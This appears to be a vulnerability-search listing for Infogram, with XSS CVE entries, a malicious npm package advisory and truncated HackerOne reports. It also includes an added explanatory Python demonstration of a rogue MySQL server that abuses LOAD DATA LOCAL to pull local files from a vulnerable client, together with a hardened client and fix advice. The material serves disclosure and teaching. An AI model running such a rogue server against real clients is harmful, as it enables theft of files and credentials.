43 matches found
EUVD-2023-56864
Malicious code in bioql PyPI...
CVE-2023-52191
Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS. This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1...
Cross site scripting
Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS. This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1...
CVE-2023-52191
CVE-2023-52191 affects the WordPress Infogram plugin (Infogram – Add charts, maps and infographics)
CVE-2023-52191 WordPress Infogram Plugin <= 1.6.1 is vulnerable to Cross Site Scripting (XSS)
Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in Torbjon Infogram – Add charts, maps and infographics allows Stored XSS. This issue affects Infogram – Add charts, maps and infographics: from n/a through 1.6.1...
WordPress plugin Infogram Cross-Site Scripting Vulnerability
WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blogging platform written in PHP that runs on PHP and MySQL servers and supports personal blog sites. A WordPress plugin is an application extension for the platform. A security vulnerability exists in WordPres...
Infogram <= 1.6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
Description The Infogram plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject...
WordPress Infogram Plugin <= 1.6.1 is vulnerable to Cross Site Scripting (XSS)
Software: Infogram
Type: Plugin
Vulnerable versions: <= 1.6.1
Fixed in: N/A
OWASP Top 10: A3: Injection
Classification: Cross Site Scripting (XSS)
CVE: CVE-2023-52191
Patch priority: Low
CVSS severity: Low (6.5)
PSID: 7dac0f9fc955
Credits: Ngô Thiên An (ancorn) from VNPT-VCI
Required...
Malicious code in @infogram/fetlife-assets (npm)
Source: ghsa-malware 0bbc7fa5fbbaaa93092400eb4d10b827920eedaa68af76b4db32d16254661188. Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MAL-2022-357 Malicious code in @infogram/fetlife-assets (npm)
Source: ghsa-malware 0bbc7fa5fbbaaa93092400eb4d10b827920eedaa68af76b4db32d16254661188. Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Infogram: Bypass to report #280389 [Thinking The issue is not fixed Yet]
Please see the report https://hackerone.com/reports/280389. There it was mentioned that it is resolved, but the fact is that I tried with 5000 and it flooded my email. I think the issue is not solved. Please look into this. F668239 Impact: Please fix as rate limit on the password reset functionalit...
Infogram: LFI through the MySQL connection
Hello team! I've found a way to read Infogram's server local files through the MySQL connection. The problem is that you're using the LOAD DATA LOCAL feature with your MySQL client. This is how an attacker can easily send the server's local files to her/his database. I've successfully read the...
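The report above describes the client side of a well-known MySQL protocol weakness: after a client sends any query, the server (not the client) decides whether the reply is a result set or a LOCAL INFILE request, and a client with LOCAL INFILE enabled will read the named file from its own disk and ship it to the server. The following is an added example, not code from the report or from Infogram: it implements both sides of that exchange over localhost with the MySQL packet framing (3-byte length, 1-byte sequence id), a rogue server that answers every query with a 0xFB request for a file path of its choosing, and a client that either honours the request (the vulnerable configuration) or refuses it. The handshake and authentication are omitted as a simplifying assumption; the secret file, its content and the query text are constructed for the demonstration.

```python
"""Added example: rogue MySQL server abusing LOAD DATA LOCAL, with a vulnerable
and a hardened client. Not from the Infogram report or any project code.
Assumption: the exchange starts after authentication (handshake omitted)."""
import os
import socket
import tempfile
import threading

SECRET_CONTENT = b"db_password=hunter2\n"  # constructed sample file content
MAX_PAYLOAD = 0xFFFFFF                       # largest payload one packet can carry


def frame(payload, seq):
    """MySQL packet: 3-byte little-endian length, 1-byte sequence id, payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def recv_exact(sock, n):
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed connection")
        buf += chunk
    return bytes(buf)


def read_packet(sock):
    """Return (payload, sequence id) of the next packet."""
    header = recv_exact(sock, 4)
    return recv_exact(sock, int.from_bytes(header[:3], "little")), header[3]


def rogue_server(listener, target_path, captured):
    """Attacker-controlled server: answers the client's query with a LOCAL INFILE
    request (0xFB + filename) and collects whatever the client sends back."""
    conn, _ = listener.accept()
    with conn:
        _query, seq = read_packet(conn)              # COM_QUERY; its text is irrelevant
        conn.sendall(frame(b"\xfb" + target_path.encode(), seq + 1))
        while True:                                  # file arrives as packets, empty packet ends it
            chunk, seq = read_packet(conn)
            if not chunk:
                break
            captured.extend(chunk)
        # OK packet: header 0x00, affected rows 0, last insert id 0, status, warnings
        conn.sendall(frame(b"\x00\x00\x00\x02\x00\x00\x00", seq + 1))


def client_query(host, port, sql, allow_local_infile):
    """Client side. allow_local_infile=True reproduces the vulnerable configuration:
    the client trusts the server's file request and uploads the local file."""
    with socket.create_connection((host, port)) as sock:
        sock.sendall(frame(b"\x03" + sql.encode(), 0))   # COM_QUERY
        resp, seq = read_packet(sock)
        if resp[:1] != b"\xfb":
            return resp                                   # ordinary result / OK / ERR
        filename = resp[1:].decode()
        if not allow_local_infile:
            sock.sendall(frame(b"", seq + 1))             # refuse: only the terminator
            read_packet(sock)                             # consume server's reply
            raise PermissionError("server asked for local file %r; LOCAL INFILE disabled" % filename)
        with open(filename, "rb") as fh:                  # vulnerable path: read and send it
            data = fh.read()
        seq += 1
        for off in range(0, len(data), MAX_PAYLOAD):
            sock.sendall(frame(data[off:off + MAX_PAYLOAD], seq))
            seq += 1
        sock.sendall(frame(b"", seq))                     # empty packet terminates the upload
        return read_packet(sock)[0]


def run_exchange(allow_local_infile):
    """Run one query against the rogue server; return the bytes the attacker captured
    (empty when the client refuses the LOCAL INFILE request)."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:   # constructed "secret" file
        tmp.write(SECRET_CONTENT)
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    captured = bytearray()
    worker = threading.Thread(target=rogue_server, args=(listener, tmp.name, captured), daemon=True)
    worker.start()
    try:
        client_query("127.0.0.1", listener.getsockname()[1], "SELECT 1", allow_local_infile)
    except PermissionError:
        pass
    worker.join(5)
    listener.close()
    os.unlink(tmp.name)
    return bytes(captured)


if __name__ == "__main__":
    print("vulnerable client leaked:", run_exchange(True))
    print("hardened client leaked:  ", run_exchange(False))
```

The practical fix is on the client: disable LOCAL INFILE in the driver (the equivalent of the hardened branch above) unless the application genuinely needs it, and never point a client at a MySQL endpoint an untrusted party can control.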
Infogram: Privilege escalation allows to use iframe functionality w/o upgrade
Hello team! I've found a privilege escalation issue which allows setting iframes in projects without upgrading. Steps to reproduce: - Log in - Navigate to the project - Choose integrations and click the IFrame - See that you get an "Upgrade now" notification F501019 - Inspect the page with developer...
Infogram: User account blocking by Internal Server error
If you send language=en to https://infogram.com/api/users/me, the user will forever get an Internal Server Error, EVEN AFTER re-logging in: https://youtu.be/AxYa11lEiWA I don't know why HackerOne can't upload this video, so I uploaded it privately to YouTube! In this video, I'm trying to re-login...
Infogram: possibility to create account without username
Hi, infogram.com doesn't allow us to go to the next step until we give a name for our account, but I bypassed that. I am able to create an account without any name, just by modifying the response field. Steps: 1. Create a new account, until you reach the page where you have to give your name. 2. Give a name and intercept th...
Infogram: New team invitation functionality allows extend team without upgrade
A privilege escalation vulnerability was found which allowed bypassing the limitation on team members...
Infogram: Persistent XSS in share button
A persistent XSS in the "Share" button was found: 1. In the custom link field for the "Share" button add: ". 2. Share the infographic publicly, navigate to its public URL and click the "Share" button. 3. See that the pop-up window activates...
Infogram: Bypass insecure password validation
Hi Team, Summary: Registration checks at password creation whether the password is insecure, but the password reset page was not doing the same validation, so when I input an insecure password using the password reset, the validation on password creation can be bypassed because the password...